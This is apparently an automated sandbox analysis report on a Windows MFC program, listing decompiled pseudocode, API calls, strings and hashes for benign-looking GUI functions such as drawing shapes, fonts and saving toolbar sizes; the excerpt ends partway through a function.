#6402.MFC42(Settings,Language,00000001,00008072,00000000,000000FF), ref: 0040CC71

Strings

CWUCliFr.dll, xrefs: 0040CBA8
Language, xrefs: 0040CB7A
Language, xrefs: 0040CC61
Settings, xrefs: 0040CC66
Settings, xrefs: 0040CB7F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #537#6402#800Library$#1168#1199#6026#6199FreeH_prologLoad
String ID: CWUCliFr.dll$Language$Language$Settings$Settings
API String ID: 2323526148-118327331
Opcode ID: e59b2385ead90d25a1f1d5ec795a5d9dbb69f1ab142003286f828cbc174c3b7e
Instruction ID: 72884b20e7a252d1d2219d1f4aecf037f1202cf089a83bc32124f745b725081f
Opcode Fuzzy Hash: e59b2385ead90d25a1f1d5ec795a5d9dbb69f1ab142003286f828cbc174c3b7e
Instruction Fuzzy Hash: 4B31C030700610EFDB10BF65E982AADB765AB45754F50822FF516672E2CFBC5A00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040B17A, Relevance: 30.2, APIs: 20, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040B17A(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t91;
				intOrPtr _t131;
				intOrPtr _t136;
				intOrPtr _t163;
				void* _t168;
				void* _t170;
				intOrPtr _t171;

				L004269E6();
				_t171 = _t170 - 0x154;
				_t166 = __ecx;
				 *((intOrPtr*)(_t168 - 0x10)) = _t171;
				 *((intOrPtr*)(_t168 - 0x18)) = __ecx;
				L00401A46(_t168 - 0x40);
				 *(_t168 - 4) = 0;
				 *(_t168 - 4) = 1;
				do {
					_push( *((intOrPtr*)(__ecx + 0x1c)));
					E0040162C(_t168 - 0x40);
					_t89 =  *((intOrPtr*)(__ecx + 0x1c));
					_t131 =  *((intOrPtr*)(_t89 + 0x24));
				} while (_t131 !=  *((intOrPtr*)(_t89 + 0x28)));
				_t90 =  *((intOrPtr*)(_t168 - 0x30));
				_t163 = 1;
				 *(_t168 - 4) = 0;
				if(_t90 != _t163) {
					__eflags = _t90 - 2;
					if(_t90 != 2) {
						__eflags = _t90 - 5;
						if(__eflags != 0) {
							__eflags = _t90 - 6;
							if(__eflags != 0) {
								__eflags = _t90 - 7;
								if(__eflags != 0) {
									__eflags = _t90 - 3;
									if(_t90 != 3) {
										__eflags = _t90 - 4;
										if(_t90 == 4) {
											_push(_t131);
											 *((intOrPtr*)(_t168 - 0x14)) = _t171;
											_push(_t168 - 0x34);
											L0042611A();
											_push( *((intOrPtr*)(_t168 - 0x38)));
											 *(_t168 - 4) = 0xe;
											_push(_t171);
											 *((intOrPtr*)(_t168 - 0x20)) = _t171;
											_push(_t168 - 0x3c);
											L0042611A();
											_t94 = _t168 - 0x1c;
											 *(_t168 - 4) = 0;
											_push(_t168 - 0x1c);
											L00425FE8();
											_push(_t171);
											_t136 = _t171;
											 *((intOrPtr*)(_t168 - 0x18)) = _t171;
											goto L17;
										}
									} else {
										_push(_t131);
										 *((intOrPtr*)(_t168 - 0x14)) = _t171;
										_push(_t168 - 0x34);
										L0042611A();
										_push( *((intOrPtr*)(_t168 - 0x38)));
										 *(_t168 - 4) = 0xc;
										_push(_t171);
										 *((intOrPtr*)(_t168 - 0x20)) = _t171;
										_push(_t168 - 0x3c);
										L0042611A();
										 *(_t168 - 4) = 0;
										_push(_t168 - 0x1c);
										L00425FE8();
										_push(_t171);
										 *((intOrPtr*)(_t168 - 0x18)) = _t171;
										L00401749(_t171, _t168 - 0x1c);
										L00401A96( *((intOrPtr*)(__ecx + 0x14)));
									}
								} else {
									_push(_t131);
									 *((intOrPtr*)(_t168 - 0x14)) = _t171;
									_push(_t168 - 0x34);
									L0042611A();
									_push( *((intOrPtr*)(_t168 - 0x38)));
									 *(_t168 - 4) = 0xa;
									_push(_t171);
									 *((intOrPtr*)(_t168 - 0x20)) = _t171;
									_push(_t168 - 0x3c);
									L0042611A();
									 *(_t168 - 4) = 0;
									_push(_t168 - 0x1c);
									L00425FE8();
									_push(_t171);
									 *((intOrPtr*)(_t168 - 0x18)) = _t171;
									L00401749(_t171, _t168 - 0x1c);
									E004014A1( *((intOrPtr*)(__ecx + 0x14)), __eflags);
								}
							} else {
								_push(_t131);
								 *((intOrPtr*)(_t168 - 0x14)) = _t171;
								_push(_t168 - 0x34);
								L0042611A();
								E00401C49( *((intOrPtr*)(__ecx + 0x14)), __eflags);
							}
						} else {
							_push( *((intOrPtr*)(_t168 - 0x38)));
							_push(_t131);
							 *((intOrPtr*)(_t168 - 0x14)) = _t171;
							_push(_t168 - 0x34);
							L0042611A();
							E0040207C( *((intOrPtr*)(__ecx + 0x14)), __eflags);
						}
					} else {
						_push(_t131);
						 *((intOrPtr*)(_t168 - 0x14)) = _t171;
						_push(_t168 - 0x34);
						L0042611A();
						_push( *((intOrPtr*)(_t168 - 0x38)));
						 *(_t168 - 4) = 8;
						_push(_t171);
						 *((intOrPtr*)(_t168 - 0x20)) = _t171;
						_push(_t168 - 0x3c);
						L0042611A();
						_t94 = _t168 - 0x1c;
						 *(_t168 - 4) = 0;
						_push(_t168 - 0x1c);
						L00425FE8();
						_push(_t171);
						_t136 = _t171;
						 *((intOrPtr*)(_t168 - 0x18)) = _t171;
						L17:
						L00401749(_t136, _t94);
						L00401A96( *((intOrPtr*)(_t166 + 0x14)));
						E004020C7( *((intOrPtr*)(_t166 + 0x14)), __eflags);
					}
				} else {
					_push(_t131);
					 *((intOrPtr*)(_t168 - 0x1c)) = _t171;
					_push(_t168 - 0x34);
					L0042611A();
					_push( *((intOrPtr*)(_t168 - 0x38)));
					 *(_t168 - 4) = 3;
					_push(_t171);
					 *((intOrPtr*)(_t168 - 0x18)) = _t171;
					_push(_t168 - 0x3c);
					L0042611A();
					 *(_t168 - 4) = 0;
					_push(_t168 - 0x20);
					L00425FE8();
					_push(_t171);
					 *((intOrPtr*)(_t168 - 0x14)) = _t171;
					L00401749(_t171, _t168 - 0x20);
					L00401A96( *((intOrPtr*)(__ecx + 0x14)));
					 *(_t168 - 4) = 5;
					L00401A46(_t168 - 0x60);
					_push(__ecx + 0x24);
					 *(_t168 - 4) = 6;
					L00426054();
					_push(0x44215c);
					 *((intOrPtr*)(_t168 - 0x58)) =  *((intOrPtr*)(__ecx + 0x28));
					L004261A4();
					_push(_t168 - 0x60);
					 *((intOrPtr*)(_t168 - 0x50)) = _t163;
					L00401302(__ecx);
					 *(_t168 - 4) = 5;
					L00401D48(_t168 - 0x60);
				}
				 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
				_t91 = L00401D48(_t168 - 0x40);
				 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
				return _t91;
			}

0x0040b17f
0x0040b184
0x0040b18c
0x0040b192
0x0040b195
0x0040b198
0x0040b19f
0x0040b1a2
0x0040b1a6
0x0040b1a6
0x0040b1ac
0x0040b1b1
0x0040b1b4
0x0040b1b7
0x0040b1dc
0x0040b1e1
0x0040b1e2
0x0040b1e7
0x0040b2b0
0x0040b2b3
0x0040b2f1
0x0040b2f4
0x0040b315
0x0040b318
0x0040b336
0x0040b339
0x0040b385
0x0040b388
0x0040b3d1
0x0040b3d4
0x0040b3d6
0x0040b3dc
0x0040b3df
0x0040b3e0
0x0040b3e5
0x0040b3eb
0x0040b3ef
0x0040b3f2
0x0040b3f5
0x0040b3f6
0x0040b3fb
0x0040b3fe
0x0040b401
0x0040b402
0x0040b407
0x0040b408
0x0040b40a
0x00000000
0x0040b40a
0x0040b38a
0x0040b38a
0x0040b390
0x0040b393
0x0040b394
0x0040b399
0x0040b39f
0x0040b3a3
0x0040b3a6
0x0040b3a9
0x0040b3aa
0x0040b3b2
0x0040b3b5
0x0040b3b6
0x0040b3bb
0x0040b3be
0x0040b3c2
0x0040b3ca
0x0040b3ca
0x0040b33b
0x0040b33b
0x0040b341
0x0040b344
0x0040b345
0x0040b34a
0x0040b350
0x0040b354
0x0040b357
0x0040b35a
0x0040b35b
0x0040b363
0x0040b366
0x0040b367
0x0040b36c
0x0040b36f
0x0040b373
0x0040b37b
0x0040b37b
0x0040b31a
0x0040b31a
0x0040b320
0x0040b323
0x0040b324
0x0040b32c
0x0040b32c
0x0040b2f6
0x0040b2f6
0x0040b2fc
0x0040b2ff
0x0040b302
0x0040b303
0x0040b30b
0x0040b30b
0x0040b2b5
0x0040b2b5
0x0040b2bb
0x0040b2be
0x0040b2bf
0x0040b2c4
0x0040b2ca
0x0040b2ce
0x0040b2d1
0x0040b2d4
0x0040b2d5
0x0040b2da
0x0040b2dd
0x0040b2e0
0x0040b2e1
0x0040b2e6
0x0040b2e7
0x0040b2e9
0x0040b40d
0x0040b40e
0x0040b416
0x0040b41e
0x0040b41e
0x0040b1ed
0x0040b1ed
0x0040b1f3
0x0040b1f6
0x0040b1f7
0x0040b1fc
0x0040b202
0x0040b206
0x0040b209
0x0040b20c
0x0040b20d
0x0040b215
0x0040b218
0x0040b219
0x0040b21e
0x0040b221
0x0040b225
0x0040b22d
0x0040b235
0x0040b239
0x0040b244
0x0040b245
0x0040b249
0x0040b251
0x0040b259
0x0040b25c
0x0040b266
0x0040b267
0x0040b26a
0x0040b272
0x0040b276
0x0040b276
0x0040b423
0x0040b42a
0x0040b434
0x0040b43d

APIs

_EH_prolog.MSVCRT ref: 0040B17F

Part of subcall function 0040162C: _EH_prolog.MSVCRT ref: 0041BD46
Part of subcall function 0040162C: #882.MFC42(?,00000000), ref: 0041BD6E
Part of subcall function 0040162C: #882.MFC42(?,?,?,?,00000000), ref: 0041BD82
Part of subcall function 0040162C: #882.MFC42(?,?,?,?,?,?,?,00000000), ref: 0041BD96

#535.MFC42(?,?), ref: 0040B1F7
#535.MFC42(?,?,?,?,?), ref: 0040B20D
#3811.MFC42(?,?,?,?,?,?), ref: 0040B219
#858.MFC42(?,00000000,?,?,?,?,?,?,?), ref: 0040B249
#860.MFC42(0044215C,?,00000000,?,?,?,?,?,?,?), ref: 0040B25C

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #882$#535H_prolog$#3811#858#860
String ID:
API String ID: 40284684-0
Opcode ID: 7d537c24c71f64908e1c52fbdef3c2b5e17a0d80a82b5702752e770c448acad3
Instruction ID: 7f9009356d8474273915c0ee073ac835b291450d51d662ac8099fd279c1cff75
Opcode Fuzzy Hash: 7d537c24c71f64908e1c52fbdef3c2b5e17a0d80a82b5702752e770c448acad3
Instruction Fuzzy Hash: 97816370E01209EBCF14EFE5D9569AEBBB9EF45318F50055FF401B3292C7386A04CA6A

Uniqueness

Uniqueness Score: -1.00%

Function 004010AF, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004010AF() {
				long _t36;
				int _t37;
				int _t40;
				void* _t63;

				L004269E6();
				 *(_t63 - 0x1c) = 0x42e55c;
				 *((intOrPtr*)(_t63 - 0x18)) = 0;
				 *((intOrPtr*)(_t63 - 4)) = 0;
				 *((intOrPtr*)(_t63 - 0x10)) = 0;
				 *(_t63 - 0x14) = 0x42e544;
				_t8 = _t63 + 0x14; // 0x42e544
				 *((char*)(_t63 - 4)) = 1;
				_push(CreateSolidBrush( *_t8));
				L004264BC();
				_push(CreatePen(0, 0,  *(_t63 + 0x14)));
				L004264BC();
				_t36 = _t63 - 0x1c;
				_push(_t36);
				L00426570();
				 *(_t63 + 0x14) = _t36;
				_t37 = _t63 - 0x14;
				_push(_t37);
				L00426636();
				 *(_t63 + 0xc) = _t37;
				_t40 = Ellipse( *( *((intOrPtr*)(_t63 + 8)) + 4),  *(_t63 + 0xc),  *(_t63 + 0x10),  *(_t63 + 0xc) + 6,  *(_t63 + 0x10) + 6);
				_push( *(_t63 + 0x14));
				L00426570();
				_push( *(_t63 + 0xc));
				L00426636();
				L00425FA6();
				L00425FA6();
				 *(_t63 - 0x14) = 0x42c514;
				 *((char*)(_t63 - 4)) = 2;
				L00425FA6();
				 *(_t63 - 0x14) = 0x42c4fc;
				 *(_t63 - 0x1c) = 0x42c514;
				 *((intOrPtr*)(_t63 - 4)) = 3;
				L00425FA6();
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t40;
			}

0x004162dc
0x004162ec
0x004162f6
0x004162f9
0x004162fc
0x004162ff
0x00416306
0x00416309
0x00416313
0x00416317
0x00416327
0x0041632b
0x00416333
0x00416336
0x00416339
0x0041633e
0x00416341
0x00416344
0x00416347
0x0041634c
0x0041635e
0x00416364
0x00416369
0x0041636e
0x00416373
0x0041637b
0x00416383
0x0041638d
0x00416393
0x00416397
0x0041639c
0x004163a3
0x004163a9
0x004163b0
0x004163bb
0x004163c3

APIs

_EH_prolog.MSVCRT ref: 004162DC
CreateSolidBrush.GDI32(DB), ref: 0041630D
#1641.MFC42(00000000), ref: 00416317
CreatePen.GDI32(00000000,00000000,0042E544), ref: 00416321
#1641.MFC42(00000000), ref: 0041632B
#5787.MFC42(0042E55C,00000000), ref: 00416339
#5787.MFC42(0042E544,0042E55C,00000000), ref: 00416347
Ellipse.GDI32(00000001,?,?,?,?), ref: 0041635E
#5787.MFC42(0042E544), ref: 00416369
#5787.MFC42(?,0042E544), ref: 00416373
#2414.MFC42(?,0042E544), ref: 0041637B
#2414.MFC42(?,0042E544), ref: 00416383
#2414.MFC42(?,0042E544), ref: 00416397
#2414.MFC42(?,0042E544), ref: 004163B0

Strings

DB, xrefs: 004162FF
\B, xrefs: 004162EC
DB, xrefs: 00416306

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#5787$#1641Create$BrushEllipseH_prologSolid
String ID: DB$DB$\B
API String ID: 361696367-3260928073
Opcode ID: 6de5fcd1e2b4d638e1daded483a22f0cbbd2ac7cbcbb992c79a64f438798f46d
Instruction ID: 0742fc306519cae10e1eaaa39b88ebb73b3390f671d3f208fb94ae8d1fa4b640
Opcode Fuzzy Hash: 6de5fcd1e2b4d638e1daded483a22f0cbbd2ac7cbcbb992c79a64f438798f46d
Instruction Fuzzy Hash: A42161B1E0012AEBCB01EF95EA459EFBB78EF44308F51401EF411A3251DB785B15CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8ED, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040F8ED(intOrPtr* __ecx) {
				intOrPtr _t45;
				intOrPtr _t50;
				int _t52;
				intOrPtr* _t54;
				intOrPtr _t55;
				void* _t60;
				intOrPtr* _t66;
				intOrPtr _t71;
				intOrPtr* _t102;
				void* _t104;

				L004269E6();
				_t66 = __ecx;
				_t45 =  *((intOrPtr*)(__ecx + 8));
				_t71 =  *((intOrPtr*)(__ecx + 0xc));
				 *((intOrPtr*)(_t104 - 0x28)) = _t45;
				 *((intOrPtr*)(_t104 - 0x24)) = _t71;
				 *((intOrPtr*)(_t104 - 0x20)) = _t45 + 0xb;
				 *((intOrPtr*)(_t104 - 0x1c)) = _t71 + 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t102 =  *((intOrPtr*)(_t104 + 8));
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) != 0) {
						_push(GetSysColor(0x10));
						_push(0x14);
						goto L4;
					}
				} else {
					_push(GetSysColor(0x14));
					_push(0x10);
					L4:
					_push(GetSysColor());
					_push(_t104 - 0x38);
					L004264D4();
				}
				 *((intOrPtr*)(_t104 - 0x18)) = GetTextColor( *(_t102 + 8));
				 *((intOrPtr*)(_t104 + 8)) =  *_t102;
				_t50 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 8)) + 0x38))(GetSysColor(0x12));
				L00425FBE();
				 *((intOrPtr*)(_t104 - 0x14)) = _t50;
				 *((intOrPtr*)(_t104 - 0x1c)) = 0;
				 *((intOrPtr*)(_t104 - 0x20)) = 0x42dce0;
				 *(_t104 - 4) = 0;
				_t52 = MulDiv(0x3c, 0x60, GetDeviceCaps( *(_t102 + 8), 0x58));
				L004264C2();
				_t54 =  *((intOrPtr*)( *_t102 + 0x30))(_t104 - 0x20, _t52, "Marlett", 0, 1);
				L00425FB8();
				_t55 =  *_t54;
				 *((intOrPtr*)(_t104 + 8)) =  *((intOrPtr*)(_t55 - 8));
				 *(_t104 - 4) = 1;
				 *((intOrPtr*)( *_t102 + 0x64))( *((intOrPtr*)(_t66 + 8)) + 2,  *((intOrPtr*)(_t66 + 0xc)) + 2, _t55,  *((intOrPtr*)(_t104 + 8)), "r");
				 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
				L00425DFC();
				 *((intOrPtr*)( *_t102 + 0x30))(_t54);
				L00425FBE();
				_t60 =  *((intOrPtr*)( *_t102 + 0x38))( *((intOrPtr*)(_t104 - 0x18)),  *((intOrPtr*)(_t104 - 0x14)));
				 *((intOrPtr*)(_t104 - 0x20)) = 0x42c514;
				 *(_t104 - 4) = 2;
				L00425FA6();
				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
				return _t60;
			}

0x0040f8f2
0x0040f8fb
0x0040f8ff
0x0040f902
0x0040f905
0x0040f908
0x0040f917
0x0040f91a
0x0040f91d
0x0040f91e
0x0040f922
0x0040f923
0x0040f924
0x0040f92d
0x0040f93c
0x0040f942
0x0040f943
0x00000000
0x0040f943
0x0040f92f
0x0040f933
0x0040f934
0x0040f945
0x0040f947
0x0040f94b
0x0040f94e
0x0040f94e
0x0040f960
0x0040f963
0x0040f96e
0x0040f975
0x0040f97c
0x0040f97f
0x0040f982
0x0040f98b
0x0040f99c
0x0040f9ac
0x0040f9b9
0x0040f9c6
0x0040f9cb
0x0040f9d8
0x0040f9e2
0x0040f9eb
0x0040f9ee
0x0040f9f5
0x0040f9ff
0x0040fa07
0x0040fa13
0x0040fa16
0x0040fa20
0x0040fa27
0x0040fa32
0x0040fa3a

APIs

_EH_prolog.MSVCRT ref: 0040F8F2
GetSysColor.USER32(00000014), ref: 0040F931
GetSysColor.USER32(00000010), ref: 0040F940
GetSysColor.USER32(00000014), ref: 0040F945
#2567.MFC42(?,00000000), ref: 0040F94E
GetTextColor.GDI32(?), ref: 0040F956
GetSysColor.USER32(00000012), ref: 0040F966
#5875.MFC42(00000001), ref: 0040F975
GetDeviceCaps.GDI32(?,00000058), ref: 0040F991
MulDiv.KERNEL32(0000003C,00000060,00000000), ref: 0040F99C
#2243.MFC42(00000000,Marlett,00000000), ref: 0040F9AC
#537.MFC42(00440B98), ref: 0040F9C6
#800.MFC42 ref: 0040F9F5
#5875.MFC42(?), ref: 0040FA07
#2414.MFC42 ref: 0040FA27

Strings

Marlett, xrefs: 0040F9A3

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#5875$#2243#2414#2567#537#800CapsDeviceH_prologText
String ID: Marlett
API String ID: 164345195-3688754224
Opcode ID: 8a6b958600de1f1a897d372601a14cbb52005175a53d4af7661fd62cc7fe85f5
Instruction ID: aab4e6f7782997dc97c28e0729f5868abe27c6769d6c128b8bb66ff2409f014d
Opcode Fuzzy Hash: 8a6b958600de1f1a897d372601a14cbb52005175a53d4af7661fd62cc7fe85f5
Instruction Fuzzy Hash: 18418171A00614EFCB15DF95D885FAEBBB5FF88700F50401EF945AB291CB745941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004116C8, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E004116C8(void* __eax, void* __ecx, intOrPtr _a4) {
				char _v260;
				CHAR* _t24;
				void* _t34;

				_t34 = __ecx;
				L00425E44();
				L00426510();
				wsprintfA( &_v260, "%s-SCBar-%d", _a4, __eax);
				_push( *((intOrPtr*)(_t34 + 0x84)));
				_push("sizeHorzCX");
				_push( &_v260);
				L0042624C();
				_push( *((intOrPtr*)(_t34 + 0x88)));
				_push("sizeHorzCY");
				_push( &_v260);
				L0042624C();
				_push( *((intOrPtr*)(_t34 + 0x8c)));
				_push("sizeVertCX");
				_push( &_v260);
				L0042624C();
				_push( *((intOrPtr*)(_t34 + 0x90)));
				_push("sizeVertCY");
				_push( &_v260);
				L0042624C();
				_push( *((intOrPtr*)(_t34 + 0x94)));
				_push("sizeFloatCX");
				_push( &_v260);
				L0042624C();
				_push( *((intOrPtr*)(_t34 + 0x98)));
				_t24 =  &_v260;
				_push("sizeFloatCY");
				_push(_t24);
				L0042624C();
				return _t24;
			}

0x004116d3
0x004116d5
0x004116df
0x004116f4
0x00411703
0x0041170b
0x00411710
0x00411711
0x00411716
0x00411724
0x00411729
0x0041172a
0x0041172f
0x0041173d
0x00411742
0x00411743
0x00411748
0x00411756
0x0041175b
0x0041175c
0x00411761
0x0041176f
0x00411774
0x00411775
0x0041177a
0x00411780
0x00411788
0x0041178d
0x0041178e
0x00411796

APIs

#1168.MFC42 ref: 004116D5
#3089.MFC42 ref: 004116DF
wsprintfA.USER32 ref: 004116F4
#6402.MFC42(?,sizeHorzCX,?), ref: 00411711
#6402.MFC42(?,sizeHorzCY,?,?,sizeHorzCX,?), ref: 0041172A
#6402.MFC42(?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCX,?), ref: 00411743
#6402.MFC42(?,sizeVertCY,?,?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCX,?), ref: 0041175C
#6402.MFC42(?,sizeFloatCX,?,?,sizeVertCY,?,?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCX,?), ref: 00411775
#6402.MFC42(?,sizeFloatCY,?,?,sizeFloatCX,?,?,sizeVertCY,?,?,sizeVertCX,?,?,sizeHorzCY,?,?), ref: 0041178E

Strings

sizeHorzCY, xrefs: 00411724
%s-SCBar-%d, xrefs: 004116EE
sizeVertCY, xrefs: 00411756
sizeFloatCX, xrefs: 0041176F
sizeHorzCX, xrefs: 0041170B
sizeFloatCY, xrefs: 00411788
sizeVertCX, xrefs: 0041173D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #6402$#1168#3089wsprintf
String ID: %s-SCBar-%d$sizeFloatCX$sizeFloatCY$sizeHorzCX$sizeHorzCY$sizeVertCX$sizeVertCY
API String ID: 830531456-2433185349
Opcode ID: 8eebb0ad80f3cb585a723c84734895b73363e3c458f5d5879b32f2bec5e6fccc
Instruction ID: ce1d6f130222f0aff37d73ec1b3c2292528de4fe488021d3fbdc8c86680536b9
Opcode Fuzzy Hash: 8eebb0ad80f3cb585a723c84734895b73363e3c458f5d5879b32f2bec5e6fccc
Instruction Fuzzy Hash: C811A734700328E7DF2577359C45FCB7B6EAF84304F40059AB949A3252D979A5948B78

Uniqueness

Uniqueness Score: -1.00%

Function 00401537, Relevance: 27.2, APIs: 18, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00401537(void* __edx) {
				struct HWND__* _t91;
				struct HDC__* _t93;
				signed int _t102;
				void* _t109;
				signed int _t110;
				intOrPtr _t111;
				signed int _t112;
				struct HWND__* _t121;
				intOrPtr _t123;
				intOrPtr _t127;
				wchar_t* _t128;
				signed int _t130;
				signed int _t133;
				intOrPtr _t141;
				signed int _t142;
				void* _t153;
				struct HDC__* _t163;
				signed int _t166;
				struct tagSIZE _t170;
				signed int _t173;
				void* _t174;

				_t153 = __edx;
				L004269E6();
				_t127 =  *((intOrPtr*)(_t174 + 8));
				 *((intOrPtr*)(_t174 - 0x10)) = 4;
				_t166 = ( *(_t127 + 0x14))[4];
				if(L0040214E( *(_t127 + 0x14)) != 0 &&  *0x440cfc != 0) {
					 *((intOrPtr*)(_t174 - 0x10)) = 7;
				}
				if((_t166 & 0x00000800) == 0) {
					 *(_t174 - 0x20) =  *(_t174 - 0x20) & 0x00000000;
					 *((intOrPtr*)(_t174 - 0x24)) = 0x42dce0;
					_t130 = 0xf;
					 *(_t174 - 4) =  *(_t174 - 4) & 0x00000000;
					memset(_t174 - 0x74, 0, _t130 << 2);
					 *(_t174 - 0x1c8) = 0x154;
					SystemParametersInfoA(0x29, 0x154, _t174 - 0x1c8, 0);
					_t133 = 0xf;
					_push(CreateFontIndirectA(memcpy(_t174 - 0x74, _t174 - 0x128, _t133 << 2)));
					L004264BC();
					_t91 = L00401307();
					 *(_t174 - 0x1c) = _t91;
